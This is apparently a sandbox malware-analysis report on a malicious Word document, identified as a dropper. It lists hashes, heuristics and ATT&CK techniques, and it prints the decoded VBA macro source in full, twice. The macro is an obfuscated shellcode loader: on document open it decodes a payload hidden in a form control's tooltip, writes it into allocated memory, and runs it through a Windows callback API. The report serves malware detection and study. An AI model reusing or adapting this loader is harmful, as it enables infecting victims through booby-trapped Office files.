Office (OLE) malware analysis — malicious · 2cda0d95cf4482ea

MALICIOUS

Office (OLE)

142.0 KB Created: 2016-11-03 12:57:00 Authoring application: Microsoft Office Word First seen: 2016-12-03

MD5: c49c6fe53bf6f7bbb48d4623ab00a316 SHA-1: a9da064c1757acff31325b1b1138a9c118b26e11 SHA-256: 2cda0d95cf4482eac230538ac6986cb8bc2aa84708324955a0149bedab60ee97

110 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic. The VBA code references the VirtualAlloc API, suggesting memory manipulation for payload execution. The Document_Open macro is present, which is commonly used to trigger malicious actions upon opening the document. While the specific download URL is obfuscated within the VBA script, the presence of these elements strongly indicates a dropper functionality.

Heuristics 5

ClamAV: Doc.Dropper.Agent-1817346 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1817346
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_Open()
Dim fibrocalcific As Integer
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12997 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12997 bytes
SHA-256: `8ff5671a478ba032ecc76b6518387f7f5cbecfb546f9bd2c5f10b1d53a90fd92`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub oryalist() Dim platinum As Long Dim stupe As Variant Set saxe = disposable.whitefly.BoundValue("Tab2") proved = saxe.ControlTipText shamefacedly = 7368 falco = Right(proved, shamefacedly) basket = baron.cannibalize(falco) deterioration = 61 commentator = 88 If deterioration + commentator < 15 Then deterioration = Mid("beaumontcoapprovingly", 9, 2) & Right$("sympatheticelos", 4) & Left("tatwanton", 3) infrequently = "advoutry" currentness = Left("azpalms", 2) & Right$("ammodytesymia", 4) Else lucus = lucus * 1 commentator = 85 End If dipole = UCase$("eM") & Right$("avocationalbroi", 4) & Mid("magnetdereramber", 7, 5) hobbyhorse = UCase$("bL") & Mid("bacteriolysisueeyrelationships", 14, 4) & LCase$("ed") #If VBA6 And Win64 Then Dim counted As Byte Dim frontbencher As shamrock Dim rien As LongPtr frontbencher.elseifstatement = 65 - 65 Dim larcenist As Integer #Else Dim freestanding As Long frontbencher = 0 Dim anurous As String Dim rien As Long #End If patriarchate = 0 niff = "tr" & UCase$("UCKlinG") sequitur = 116 - 42 - 54 + 4076 molarity = 74 josh = 93 If molarity + josh < 10 Then molarity = Right$("foundedhet", 3) & Right$("groupereroge", 5) & "neity" acrophobia = lamasery + 492 footrace = Mid("woodshedtetselfaddressed", 9, 3) & UCase$("RaClIniS") Else lamasery = lucus + 171 josh = 12 End If aleurites = Mid("charlemagneemanproductive", 12, 4) & "cipati" & "on" armband = LCase$("mU") & "ff" amphibrach = "asterismal" retina = 63 nerita = 83 If retina + nerita < 28 Then retina = Left("afbullace", 2) & "firm" pontem = "hated" piercingly = Left("cuephedra", 2) & UCase$("SkEE") & "l" Else psychomancy = psychomancy nerita = 43 End If gempylidae = basket expeditionary = "mite" rien = hoc(gempylidae) colton = Right$("chiefin", 2) & Mid("airtighteffaagas", 9, 4) & Left("ceablechatterer", 6) ulatrophia = "neurology" #If VBA6 And Win64 Then Dim particulate As Integer anthology = "hist" armis = "nicety" subdepartment = 65 + 21 - 20 + 1214 #ElseIf Win32 Then oldfashioned = "almightiness" drawnout = Right$("figbirdac", 2) & Mid("rosinweedcentinfluenza", 10, 4) & Left("orbehavior", 2) allowances = "frost" shuffling = 1 + 22 + 483 subdepartment = shuffling + 3171 #End If Dim practicable As String Dim ductless As Integer Dim incensebreathing As Long incensebreathing = 2048 Dim cuckoo As Long cuckoo = rien + subdepartment Dim abusive As Long abusive = 63 - 62 cautiously = droger(cuckoo, incensebreathing, abusive, abusive) bewilder = 8 While bewilder < 13 befringed = Left("coaurea", 2) & LCase$("nCuR") & LCase$("rent") arvicola = "sicilian" bewilder = bewilder + 1 lucus = lucus + 94 Wend End Sub Function hoc(artfully) Dim piqueria As Byte Dim anaclisis As String Dim issueless As Long contrasted issueless, ByVal VarPtr(artfully) + 8, 4 Dim dram As Variant Dim subnormality As Long Dim heiress As Long adv = 0 delaware = 15 + 51 - 67 impedite = 11 - 11 infrequently = "bunter" infrequently = "hardhitting" alstroemeria = 117 - 106 - 22 + 4107 washstand = segregation(ByVal delaware, impedite, 7397, alstroemeria, 64) psychomancy = pontem contrasted heiress, ByVal VarPtr(washstand) + 8, 4 psychomancy = pontem contrasted ByVal heiress, ByVal issueless, 5538 dud = 73 boniness = 70 If dud + boniness < 1 Then dud = LCase$("pe") & UCase$("CCAbLE") infrequently = "cursitor" proclamation = Mid("chandifrgomphotheriidae", 7, 2) & Left("ecklselfabasement", 4) & Mid("statesmanshipeaccused", 14, 1) Else lucus = lamasery + 215 boniness = 48 End If hoc = heiress End Function Private Sub Document_Open() Dim fibrocalcific As Integer Dim individual As Integer grue = "vara" oryalist chalice = 91 neat = 77 If chalice + neat < 17 Then chalice = "quo" & "dlibe" & UCase$("T") lucus = acrophobia \ 356 corroborant = LCase$("DEP") & Left("ositorcardiospermum", 6) Else lucus = acrophobia / 234 neat = 22 End If End Sub Sub IterateOpenForms() Dim frm As Form For Each frm In Forms 'Print the name of the referenced form to the Immediate window Debug.Print frm.Name Next frm End Sub Attribute VB_Name = "baron" 'I'd like to think there's more something more #If VBA6 And Win64 Then 'I keep telling myself that there's something more Public Type shamrock 'so if it all fails just throw it back in my face and bury me elseifstatement As LongPtr 'I can't watch things further complicate End Type 'have mercy please God erase us Public Declare PtrSafe Function maniacal Lib "user32" Alias "OpenClipboard" (donnybrook As LongPtr) As Boolean 'I'd like to think there's more something more Public Declare PtrSafe Function aestas Lib "kernel32" Alias "Sleep" (blacksnake As LongPtr) 'all the thoughts in my head are constantly .. haunting me Public Declare PtrSafe Function paleomammalogy Lib "user32" Alias "SetParent" (ByVal blessed As LongPtr, ByVal defenselessness As LongPtr,marplot As LongPtr) As LongPtr 'I can't watch things further complicate Public Declare PtrSafe Function cumulatively Lib "user32" Alias "GetUpdateRect" (magician As LongPtr, llama As LongPtr,coccidae As LongPtr) As Boolean 'I hope that I don't bore you while I whine about it Public Declare PtrSafe Sub contrasted Lib "ntdll.dll" Alias "RtlMoveMemory" (unsought As Any, capriccioso As Any, ByVal bifurcated As LongPtr) 'all the thoughts in my head are constantly .. haunting me Public Declare PtrSafe Function segregation Lib "kernel32" Alias "VirtualAllocEx" (bonanza As LongPtr, ByVal twitting As LongPtr, ByVal cadence As LongPtr, ByVal fiesta As LongPtr, ByVal firewall As LongPtr) As LongPtr 'I'm lost in this place it's such a waste Public Declare PtrSafe Function droger Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal ceremonialism As Any, ByVal carman As Any, ByVal sapotaceae As Any, ByVal disjunct As Any) As LongPtr 'I hope you won't be saddened while I cry about it Public Declare PtrSafe Function conclave Lib "user32" Alias "EndPaint" (catechetical As LongPtr,memorials As LongPtr) As LongPtr 'I keep telling myself that there's something more 'have mercy please God erase us #Else 'so if it all fails just throw it back in my face and bury me Public Declare Function morphea Lib "user32" Alias "SetParent" (ByVal alate As Long, ByVal chaplain As Long, bargello As Long) As Long 'have mercy please God erase us Public Declare Function enthusiasm Lib "user32" Alias "GetUpdateRect" (acer As Long, pioneer As Long, dominique As Long) As Boolean 'so if it all fails just throw it back in my face and bury me Public Declare Function segregation Lib "kernel32" Alias "VirtualAllocEx" (rapaciousness As Long, ByVal hellion As Long, ByVal kinfolk As Long, ByVal groschen As Long, ByVal citation As Long) As Long 'I hope you won't be saddened while I cry about it Public Declare Function hitting Lib "user32" Alias "EndPaint" (patzer As Long, archidiaconal As Long) As Long 'so if it all fails just throw it back in my face and bury me Public Declare Function balldress Lib "kernel32" Alias "Sleep" (sundrops As Long) 'so if it all fails just throw it back in my face and bury me Public Declare Function droger Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal selfexpression As Any, ByVal caruncle As Any, ByVal hamilton As Any, ByVal associative As Any) As Long 'I keep telling myself that there's something more Public Declare Function falsehood Lib "user32" Alias "OpenClipboard" (grudgingly As Long) As Boolean 'I'd like to think there's more something more Public Declare Sub contrasted Lib "ntdll.dll" Alias "RtlMoveMemory" (accelerando As Any, nighthawk As Any, ByVal airfield As Long) 'I can't watch things further complicate 'have mercy please God erase us #End If 'so if it all fails just throw it back in my face and bury me Function answering(bgirl, lettre) answering = bgirl * lettre End Function Function noli(lightsomeness, irradiate) noli = lightsomeness And irradiate End Function Sub footer() Dim cSection As Section With ActiveDocument For Each cSection In .Sections cHeader = cSection.Headers(wdHeaderFooterEvenPages) If Not cSection.Headers(wdHeaderFooterEvenPages).Exists Then cSection.PageSetup.OddAndEvenPagesHeaderFooter = True cSection.Headers(wdHeaderFooterEvenPages).Range.Text _ = "Section " & cSection.Index & " of " & .FullName cSection.Headers(wdHeaderFooterEvenPages).Range. _ Style = "Even Footer" End If Next cSection End With End Sub Function cannibalize(cleanlimbed) As String Dim acaulescent As Long Dim im(63) As Long Dim increasingly As Long Dim asphyxiate As Long acrophobia = lamasery + 462 Dim parathelypteris(63) As Long Dim caretaker(5525) As Byte Dim commedian As Integer Dim agamic() As Byte Dim father As String Dim austere As Long Dim acetous As String Dim condylura(255) As Byte Dim learner As String Dim endosmosis(63) As Long Dim naik As Long acrophobia = lucus \ 74 caracole = 262144 Dim intervert As Variant blowoff = 26 + 48 - 11 insatiably = 16515072 burglar = 45 + 63 - 63 + 258003 noncombinative = 4096 request = 101 + 65 + 77 - 179 dantescan = 65536 ashcolored = 65280 twins = 54 + 16711626 Dim menstruum As Long contest = 256 Dim cannibalism As Long anchoritic = 255 biologism = 4032 Dim mithai As Variant Dim selfconvicted(7367) As Byte pengo = 75 + 31 + 7262 For handed = 1 To pengo meaninglessness = Mid(cleanlimbed, handed, 1) arginine = Right$("clamydosporeva", 2) & "lerianaceae" ingathering = "epi" & Left("centeequilibrio", 5) & UCase$("R") polack = AscW(meaninglessness) selfconvicted(handed - 1) = polack Next Dim apprenticeship As Variant For serologic = 22 To 72 buoyantly = 72 acrophobia = lucus * 4 doorkeeper = "ta" & "xicab" doorkeeper = Left("maromniscient", 3) & Mid("leechesbleizingabnormous", 8, 8) Next serologic sculptural = 7367 daniel = 124 - 89 For ligand = 0 To sculptural selfconvicted(ligand) = selfconvicted(ligand) + 4 Next ligand plebiscitum = 51 andosite = 100 If plebiscitum + andosite < 8 Then plebiscitum = LCase$("COb") & Left("itidaarsenopyrite", 5) & UCase$("E") lamasery = acrophobia - 433 limicolae = UCase$("dEfl") & Mid("campingagratimatchmaker", 8, 6) & "on" Else lamasery = lucus And 385 andosite = 17 End If commedian = 0 antheridium = 122 threepenny = 255 For austere = 0 To threepenny If (austere >= 65) And (austere <= 90) Then condylura(austere) = austere - 65 ElseIf (austere >= 97) And (austere <= 122) Then condylura(austere) = austere - 71 ElseIf (austere >= 48) And (austere <= 57) Then condylura(austere) = austere + 4 ElseIf austere = 43 Then condylura(austere) = 62 ElseIf austere = 47 Then condylura(austere) = 63 End If Next austere For austere = 0 To 63 parathelypteris(austere) = answering(austere, request) im(austere) = answering(austere, noncombinative) endosmosis(austere) = answering(austere, caracole) Next austere conviviality = 3 While conviviality < 8 trebuket = Left("atalfresco", 2) & LCase$("tentiONal") dactylonomy = "motivated" conviviality = conviviality + 1 lamasery = lamasery - 260 Wend agamic = selfconvicted disputatiously = 66 - 78 + 16 hyponymy = 7 While hyponymy < 11 newness = "bye" naughtiness = "shutterbug" hyponymy = hyponymy + 1 infrequently = pontem Wend nanometer = 3 psychomancy = "cervix" lamasery = lucus \ 169 amazingly = nanometer + 1 octopodidae = 68 + 125 - 71 - 120 For naik = 0 To sculptural skoal = agamic(naik) increasingly = endosmosis(condylura(skoal)) _ + im(condylura(agamic(naik + 1))) + parathelypteris(condylura(agamic(naik + 2))) + condylura(agamic(naik + nanometer)) austere = noli(increasingly, twins) caretaker(acaulescent) = potboiler(austere, dantescan) austere = noli(increasingly, ashcolored) caretaker(acaulescent + 1) = potboiler(austere, contest) caretaker(acaulescent + octopodidae) = noli(increasingly, anchoritic) acaulescent = acaulescent + octopodidae + 1 naik = naik + 3 Next cannibalize = caretaker End Function Function potboiler(dolman, epergne) potboiler = dolman \ epergne End Function Attribute VB_Name = "disposable" Attribute VB_Base = "0{A38A586D-A115-4891-AAE1-18CF1CE1B13A}{4EC95B0F-1E9D-4FA9-B143-1E648A1B958B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 8ff5671a478ba032ecc76b6518387f7f5cbecfb546f9bd2c5f10b1d53a90fd92

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub oryalist()
Dim platinum As Long
Dim stupe As Variant
Set saxe = disposable.whitefly.BoundValue("Tab2")
proved = saxe.ControlTipText
shamefacedly = 7368
falco = Right(proved, shamefacedly)
basket = baron.cannibalize(falco)
deterioration = 61
commentator = 88
If deterioration + commentator < 15 Then
deterioration = Mid("beaumontcoapprovingly", 9, 2) & Right$("sympatheticelos", 4) & Left("tatwanton", 3)
infrequently = "advoutry"
currentness = Left("azpalms", 2) & Right$("ammodytesymia", 4)
Else
lucus = lucus * 1
commentator = 85
End If

dipole = UCase$("eM") & Right$("avocationalbroi", 4) & Mid("magnetdereramber", 7, 5)
hobbyhorse = UCase$("bL") & Mid("bacteriolysisueeyrelationships", 14, 4) & LCase$("ed")
#If VBA6 And Win64 Then
Dim counted As Byte
Dim frontbencher As shamrock
Dim rien As LongPtr
frontbencher.elseifstatement = 65 - 65
Dim larcenist As Integer
#Else
Dim freestanding As Long
frontbencher = 0
Dim anurous As String
Dim rien As Long
#End If
patriarchate = 0
niff = "tr" & UCase$("UCKlinG")
sequitur = 116 - 42 - 54 + 4076
molarity = 74
josh = 93
If molarity + josh < 10 Then
molarity = Right$("foundedhet", 3) & Right$("groupereroge", 5) & "neity"
acrophobia = lamasery + 492
footrace = Mid("woodshedtetselfaddressed", 9, 3) & UCase$("RaClIniS")
Else
lamasery = lucus + 171
josh = 12
End If

aleurites = Mid("charlemagneemanproductive", 12, 4) & "cipati" & "on"
armband = LCase$("mU") & "ff"
amphibrach = "asterismal"
retina = 63
nerita = 83
If retina + nerita < 28 Then
retina = Left("afbullace", 2) & "firm"
pontem = "hated"
piercingly = Left("cuephedra", 2) & UCase$("SkEE") & "l"
Else
psychomancy = psychomancy
nerita = 43
End If

gempylidae = basket
expeditionary = "mite"
rien = hoc(gempylidae)
colton = Right$("chiefin", 2) & Mid("airtighteffaagas", 9, 4) & Left("ceablechatterer", 6)
ulatrophia = "neurology"
#If VBA6 And Win64 Then
Dim particulate As Integer
anthology = "hist"
armis = "nicety"
subdepartment = 65 + 21 - 20 + 1214
#ElseIf Win32 Then
oldfashioned = "almightiness"
drawnout = Right$("figbirdac", 2) & Mid("rosinweedcentinfluenza", 10, 4) & Left("orbehavior", 2)
allowances = "frost"
shuffling = 1 + 22 + 483
subdepartment = shuffling + 3171

#End If
Dim practicable As String
Dim ductless As Integer
Dim incensebreathing As Long
incensebreathing = 2048
Dim cuckoo As Long
cuckoo = rien + subdepartment
Dim abusive As Long
abusive = 63 - 62
cautiously = droger(cuckoo, incensebreathing, abusive, abusive)
bewilder = 8
While bewilder < 13
befringed = Left("coaurea", 2) & LCase$("nCuR") & LCase$("rent")
arvicola = "sicilian"
bewilder = bewilder + 1
lucus = lucus + 94
Wend

End Sub

Function hoc(artfully)
Dim piqueria As Byte
Dim anaclisis As String
Dim issueless As Long
contrasted issueless, ByVal VarPtr(artfully) + 8, 4
Dim dram As Variant
Dim subnormality As Long
Dim heiress As Long
adv = 0
delaware = 15 + 51 - 67
impedite = 11 - 11
infrequently = "bunter"

infrequently = "hardhitting"

alstroemeria = 117 - 106 - 22 + 4107
washstand = segregation(ByVal delaware, impedite, 7397, alstroemeria, 64)
psychomancy = pontem

contrasted heiress, ByVal VarPtr(washstand) + 8, 4
psychomancy = pontem

contrasted ByVal heiress, ByVal issueless, 5538
dud = 73
boniness = 70
If dud + boniness < 1 Then
dud = LCase$("pe") & UCase$("CCAbLE")
infrequently = "cursitor"
proclamation = Mid("chandifrgomphotheriidae", 7, 2) & Left("ecklselfabasement", 4) & Mid("statesmanshipeaccused", 14, 1)
Else
lucus = lamasery + 215
boniness = 48
End If

hoc = heiress
End Function
Private Sub Document_Open()
Dim fibrocalcific As Integer
Dim individual As Integer
grue = "vara"
oryalist
chalice = 91
neat = 77
If chalice + neat < 17 Then
chalice = "quo" & "dlibe" & UCase$("T")
lucus = acrophobia \ 356
corroborant = LCase$("DEP") & Left("ositorcardiospermum", 6)
Else
lucus = acrophobia / 234
neat = 22
End If
End Sub
Sub IterateOpenForms()
    Dim frm As Form
    
    For Each frm In Forms
        'Print the name of the referenced form to the Immediate window
        Debug.Print frm.Name
    Next frm
End Sub


Attribute VB_Name = "baron"
'I'd like to think there's more something more
#If VBA6 And Win64 Then
'I keep telling myself that there's something more
Public Type shamrock
'so if it all fails just throw it back in my face and bury me
elseifstatement As LongPtr
'I can't watch things further complicate
End Type
'have mercy please God erase us
Public Declare PtrSafe Function maniacal Lib "user32" Alias "OpenClipboard" (donnybrook As LongPtr) As Boolean
'I'd like to think there's more something more
Public Declare PtrSafe Function aestas Lib "kernel32" Alias "Sleep" (blacksnake As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function paleomammalogy Lib "user32" Alias "SetParent" (ByVal blessed As LongPtr, ByVal defenselessness As LongPtr,marplot As LongPtr) As LongPtr
'I can't watch things further complicate
Public Declare PtrSafe Function cumulatively Lib "user32" Alias "GetUpdateRect" (magician As LongPtr, llama As LongPtr,coccidae As LongPtr) As Boolean
'I hope that I don't bore you while I whine about it
Public  Declare PtrSafe Sub contrasted Lib "ntdll.dll" Alias "RtlMoveMemory" (unsought As Any, capriccioso As Any, ByVal bifurcated As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public  Declare PtrSafe Function segregation Lib "kernel32" Alias "VirtualAllocEx" (bonanza As LongPtr, ByVal twitting As LongPtr, ByVal cadence As LongPtr, ByVal fiesta As LongPtr, ByVal firewall As LongPtr) As LongPtr
'I'm lost in this place it's such a waste
Public  Declare PtrSafe Function droger Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal ceremonialism As Any, ByVal carman As Any, ByVal sapotaceae As Any, ByVal disjunct As Any) As LongPtr
'I hope you won't be saddened while I cry about it
Public Declare PtrSafe Function conclave Lib "user32" Alias "EndPaint" (catechetical As LongPtr,memorials As LongPtr) As LongPtr
'I keep telling myself that there's something more

'have mercy please God erase us
#Else
'so if it all fails just throw it back in my face and bury me
Public Declare Function morphea Lib "user32" Alias "SetParent" (ByVal alate As Long, ByVal chaplain As Long, bargello As Long) As Long
'have mercy please God erase us
Public Declare Function enthusiasm Lib "user32" Alias "GetUpdateRect" (acer As Long, pioneer As Long, dominique As Long) As Boolean
'so if it all fails just throw it back in my face and bury me
Public Declare Function segregation Lib "kernel32" Alias "VirtualAllocEx" (rapaciousness As Long, ByVal hellion As Long, ByVal kinfolk As Long, ByVal groschen As Long, ByVal citation As Long) As Long
'I hope you won't be saddened while I cry about it
Public Declare Function hitting Lib "user32" Alias "EndPaint" (patzer As Long, archidiaconal As Long) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Function balldress Lib "kernel32" Alias "Sleep" (sundrops As Long)
'so if it all fails just throw it back in my face and bury me
Public Declare Function droger Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal selfexpression As Any, ByVal caruncle As Any, ByVal hamilton As Any, ByVal associative As Any) As Long
'I keep telling myself that there's something more
Public Declare Function falsehood Lib "user32" Alias "OpenClipboard" (grudgingly As Long) As Boolean
'I'd like to think there's more something more
Public Declare Sub contrasted Lib "ntdll.dll" Alias "RtlMoveMemory" (accelerando As Any, nighthawk As Any, ByVal airfield As Long)
'I can't watch things further complicate

'have mercy please God erase us
#End If
'so if it all fails just throw it back in my face and bury me
Function answering(bgirl, lettre)
answering = bgirl * lettre
End Function
Function noli(lightsomeness, irradiate)
noli = lightsomeness And irradiate
End Function
Sub footer()
    Dim cSection As Section
    With ActiveDocument
        For Each cSection In .Sections
            cHeader = cSection.Headers(wdHeaderFooterEvenPages)
            If Not cSection.Headers(wdHeaderFooterEvenPages).Exists Then
                cSection.PageSetup.OddAndEvenPagesHeaderFooter = True
                cSection.Headers(wdHeaderFooterEvenPages).Range.Text _
                    = "Section " & cSection.Index & " of " & .FullName
                cSection.Headers(wdHeaderFooterEvenPages).Range. _
                    Style = "Even Footer"
            End If
        Next cSection
    End With
End Sub

Function cannibalize(cleanlimbed) As String
Dim acaulescent As Long
Dim im(63) As Long
Dim increasingly As Long
Dim asphyxiate As Long

acrophobia = lamasery + 462

Dim parathelypteris(63) As Long
Dim caretaker(5525) As Byte
Dim commedian As Integer
Dim agamic() As Byte
Dim father As String

Dim austere As Long
Dim acetous As String

Dim condylura(255) As Byte
Dim learner As String
Dim endosmosis(63) As Long
Dim naik As Long
acrophobia = lucus \ 74

caracole = 262144
Dim intervert As Variant

blowoff = 26 + 48 - 11
insatiably = 16515072
burglar = 45 + 63 - 63 + 258003
noncombinative = 4096
request = 101 + 65 + 77 - 179
dantescan = 65536
ashcolored = 65280
twins = 54 + 16711626
Dim menstruum As Long

contest = 256
Dim cannibalism As Long

anchoritic = 255
biologism = 4032
Dim mithai As Variant
Dim selfconvicted(7367) As Byte
pengo = 75 + 31 + 7262
For handed = 1 To pengo
meaninglessness = Mid(cleanlimbed, handed, 1)
arginine = Right$("clamydosporeva", 2) & "lerianaceae"
ingathering = "epi" & Left("centeequilibrio", 5) & UCase$("R")
polack = AscW(meaninglessness)
selfconvicted(handed - 1) = polack
Next
Dim apprenticeship As Variant
For serologic = 22 To 72
buoyantly = 72
acrophobia = lucus * 4
doorkeeper = "ta" & "xicab"
doorkeeper = Left("maromniscient", 3) & Mid("leechesbleizingabnormous", 8, 8)
Next serologic

sculptural = 7367
daniel = 124 - 89
For ligand = 0 To sculptural
selfconvicted(ligand) = selfconvicted(ligand) + 4
Next ligand
plebiscitum = 51
andosite = 100
If plebiscitum + andosite < 8 Then
plebiscitum = LCase$("COb") & Left("itidaarsenopyrite", 5) & UCase$("E")
lamasery = acrophobia - 433
limicolae = UCase$("dEfl") & Mid("campingagratimatchmaker", 8, 6) & "on"
Else
lamasery = lucus And 385
andosite = 17
End If

commedian = 0
antheridium = 122
threepenny = 255
For austere = 0 To threepenny
If (austere >= 65) And (austere <= 90) Then
condylura(austere) = austere - 65
ElseIf (austere >= 97) And (austere <= 122) Then
condylura(austere) = austere - 71
ElseIf (austere >= 48) And (austere <= 57) Then
condylura(austere) = austere + 4
ElseIf austere = 43 Then
condylura(austere) = 62
ElseIf austere = 47 Then
condylura(austere) = 63
End If
Next austere
For austere = 0 To 63
parathelypteris(austere) = answering(austere, request)
im(austere) = answering(austere, noncombinative)
endosmosis(austere) = answering(austere, caracole)
Next austere
conviviality = 3
While conviviality < 8
trebuket = Left("atalfresco", 2) & LCase$("tentiONal")
dactylonomy = "motivated"
conviviality = conviviality + 1
lamasery = lamasery - 260
Wend

agamic = selfconvicted
disputatiously = 66 - 78 + 16
hyponymy = 7
While hyponymy < 11
newness = "bye"
naughtiness = "shutterbug"
hyponymy = hyponymy + 1
infrequently = pontem
Wend

nanometer = 3
psychomancy = "cervix"

lamasery = lucus \ 169

amazingly = nanometer + 1
octopodidae = 68 + 125 - 71 - 120
For naik = 0 To sculptural
skoal = agamic(naik)
increasingly = endosmosis(condylura(skoal)) _
 + im(condylura(agamic(naik + 1))) + parathelypteris(condylura(agamic(naik + 2))) + condylura(agamic(naik + nanometer))
austere = noli(increasingly, twins)
caretaker(acaulescent) = potboiler(austere, dantescan)
austere = noli(increasingly, ashcolored)
caretaker(acaulescent + 1) = potboiler(austere, contest)
caretaker(acaulescent + octopodidae) = noli(increasingly, anchoritic)
acaulescent = acaulescent + octopodidae + 1
naik = naik + 3
Next
cannibalize = caretaker
End Function

Function potboiler(dolman, epergne)
potboiler = dolman \ epergne
End Function


Attribute VB_Name = "disposable"
Attribute VB_Base = "0{A38A586D-A115-4891-AAE1-18CF1CE1B13A}{4EC95B0F-1E9D-4FA9-B143-1E648A1B958B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.